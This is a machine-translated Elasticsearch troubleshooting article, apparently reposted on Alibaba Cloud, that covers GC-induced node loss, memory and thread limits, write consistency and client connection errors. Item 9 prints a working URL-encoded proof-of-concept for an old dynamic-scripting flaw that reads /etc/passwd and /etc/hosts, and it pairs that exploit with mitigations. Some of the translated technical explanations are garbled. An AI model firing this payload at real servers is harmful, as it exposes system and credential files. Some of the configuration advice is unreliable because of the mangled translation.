Some of the problems encountered with Elasticsearch and how to fix them (keep updating) _

Some of the problems encountered with Elasticsearch and how to fix them (keep updating) __elasticsearch

Last Update:2018-08-20 Source: Internet

Author: User

Tags java throws

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

1. Node detachment caused by GC

Because the GC will cause the JVM to stop working, if a node has too long GC time, Master Ping3 (Zen Discovery The default ping failure Retries 3 times) will remove the node from the cluster, causing the index to be reassigned.

Workaround:

(1) Optimizing GC, reducing GC time.

(2) The number of retries (es parameter: ping_retries) and timeout time (es parameter: ping_timeout) Zen Discovery are adjusted.

It turned out that the root cause was a system with a node with a hard drive full. Causes system performance to degrade.

2.out of memory error

Because the size of the field data cache is unlimited by default for ES, the query will put the value of the field in memory, especially the facet query, the memory requirements are very high, it will put the results in memory, and then sorted and so on operations, always use memory, until the memory run out, An out of memory error can occur when there is not enough memory.

Workaround:

(1) To set the cache type of ES as soft Reference, its main feature is the strong reference function. This type of memory is recycled only when there is not enough memory, so they are usually not recycled when memory is sufficient. In addition, these reference objects are guaranteed to be set to NULL before Java throws OutOfMemory exceptions. It can be used to realize the cache of some common pictures, realize the function of cache, ensure the maximum use of memory without causing outofmemory. In the ES of the configuration file plus Index.cache.field.type:soft can be.

(2) Set the maximum number of ES cache data and cache expiration time, by setting index.cache.field.max_size:50000 to set the maximum cache field value to 50000, set Index.cache.field.expire: 10m set the expiration time to 10 minutes.

3. Unable to create local thread problem

Es recovery times error: recoverfilesrecoveryexception[[index][3] Failed to transfer [215] files with total size of [9.4GB]]; Nested:outofmemoryerror[unable to create new native thread]; ]]

Initially thought it was a file handle limit, but think of the previous report is too many open file this error, and also make the data larger. Check it out. The maximum number of threads for a process's JVM process is: virtual memory/(stack size *1024*1024), which means that the larger the virtual memory or the smaller the stack, the more threads can be created. Reset or will be reported that this fault, arguably can create the number of threads is fully enough, just want to be some of the limitations of the system. Later on the internet to find that is max user processes problem, this value defaults to 1024, which is the name of the user's largest open process, but the official note is that the user can create a maximum number of threads, because a process has at least one thread, so indirectly affect the maximum number of processes. This is not a mistake when you increase this parameter.

Workaround:

(1) Increase the JVM's heap memory or reduce the XSS stack size (the default is 512K).

(2) Open/etc/security/limits.conf, the soft nproc 1024 this line of 1024 to change the line.

4. Concurrent Insert data error when cluster status is yellow

[7]: Index [index], type [index], id [1569133], message [unavailableshardsexception[[index][1] [4] Shardit, [2] Active:t Imeout waiting for [1m], Request:org.elasticsearch.action.bulk.bulkshardrequest@5989fa07]]

This is the error message, when the cluster status is yellow, that is, the replica is not assigned. At that time, the replica is set to 2, only one node, when you set the copy is larger than the allocated machine, at this time if you insert data is likely to report the above error, because the ES write consistency by default is to use quorum, that is, quorum value must be greater than (copy number/2+1), I 2 that is, to insert at least two indexes, because only one node, quorum equals 1, so only inserted into the primary index, the copy can not find to report the above error.

Workaround:

(1) Remove the unassigned copy.

(2) To change the write consistency to one, that is, only write an index on the line.

5. Set up a warning when the JVM locks up memory

When setting bootstrap.mlockall:true, boot es alarm unknown mlockall error 0, because the Linux system by default allows the process to lock the memory 45k.

Workaround: Set to Unrestricted, Linux command: Ulimit-l Unlimited

6. Error using API causes cluster card to die

In fact, this is a very low-level mistake. function is to update some data, some data may be deleted, but the deletion of colleagues using the Deletebyquery this interface, through the construction of Boolquery to delete the data ID passed in, detect the data deleted. But the problem is boolquery up to only 1024 conditions, 100 are already a lot of conditions, so the query all of a sudden ES cluster card died.

Workaround: Bulk delete operation with Bulkrequest.

7.org.elasticsearch.transport.remotetransportexception:failed to deserialize exception response from Stream

Reason: The JDK version is different between ES nodes

Workaround: Unify JDK environment

8. Org.elasticsearch.client.transport.NoNodeAvailableException:No node Available

1 Port Error

Client = new Transportclient (). addtransportaddress (New Inetsockettransportaddress (IPAddress, 9300));

9300 written in 9200, no node available

If you are not connected to the local, pay attention to IP is not correct

2 The reference version of the jar quote does not match, the open service is what version, the reference Jar best match (this I did not try, anyway, my match)

3 If you change the cluster name and set the cluster name

Settings settings = Immutablesettings.settingsbuilder (). Put ("Cluster.name", "xxx"). build (); Client = new Transportclient (settings). addtransportaddress (New Inetsockettransportaddress (IPAddress, 9300));

4 cluster over 5s no response

Workaround 1. Set Client.transport.ping_timeout

2. Add while (true) in the code {

try {

Bulk.execute (). Actionget (Getretrytimeout ());

Break

}

catch (Nonodeavailableexception cont) {

Thread.Sleep (5000);

Continue

}

9.elasticsearch recently found a vulnerability, can remotely execute arbitrary code, because Elasticsearch provides the HTTP interface, resulting in the possibility of CSRF, such as through malicious page browsing attacks.

Vulnerability Impact Version:

Elasticsearch below 1.2

Test code:

http:// esserverip : 9200/_search?source=%7b%22size%22%3a1%2c%22query%22%3a%7b%22filtered%22%3a%7b% 22query%22%3a%7b%22match_all%22%3a%7b%7d%7d%7d%7d%2c%22script_fields%22%3a%7b%22%2fetc%2fhosts%22%3a%7b% 22script%22%3a%22import%20java.util.*%3b%5cnimport%20java.io.*%3b%5cnnew%20scanner (New%20File (%5C%22%2Fetc% 2fhosts%5c%22)). Usedelimiter (%5c%22%5c%5c%5c%5cz%5c%22). Next ()%3b%22%7d%2c%22%2fetc%2fpasswd%22%3a%7b%22script %22%3a%22import%20java.util.*%3b%5cnimport%20java.io.*%3b%5cnnew%20scanner (New%20file (%5C%22%2Fetc%2Fpasswd%5C %22)). Usedelimiter (%5c%22%5c%5c%5c%5cz%5c%22). Next ()%3b%22%7d%7d%7d&callback=jquery111102863897154977554_ 1400571156308&_=1400571156309

Browser will return/etc/passwd content

Solution :

1, in the configuration file elasticsearch.yml set Script.disable_dynamic:true

2, strictly restrict access to the Elasticsearch service IP address

Reference:

Http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts

503 Error after reboot

The details are as follows:

[2014-09-23 17:42:33,499] [WARN] [Transport.netty] [Erik Magnus lehnsherr] message isn't fully read (request) for [4961353] and

Action [Discovery/zen/join/validate], resetting

[2014-09-23 17:42:33,522] [INFO] [Discovery.zen] [Erik Magnus Lehnsherr] failed to send join request to master [[Red lotus][

UG2WBJPDTHOB-EJZJFRSOW][N025.CORP.NCFGROUP.COM][INET[/10.18.6.25:9300]]], reason [ Org.elasticsearch.transport.RemoteTransportException:

[Red Lotus] [INET[/10.18.6.25:9300]] [Discovery/zen/join]; Org.elasticsearch.transport.RemoteTransportException: [Erik Magnus Lehnsherr]

[INET[/10.18.6.90:9300]] [Discovery/zen/join/validate]; Org.elasticsearch.ElasticsearchIllegalArgumentException:No Custom Index Metadat

A factory registered for type [Rivers]]

Problem reason: All use the default cluster name, different people different I configuration sent to the cluster will connect and select Master, sometimes because of IP restrictions can not connect.

Change: Own test service as much as possible personality naming

References: http://blog.csdn.net/laigood/article/details/8193170

From http://blog.csdn.net/july_2/article/details/24728733

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More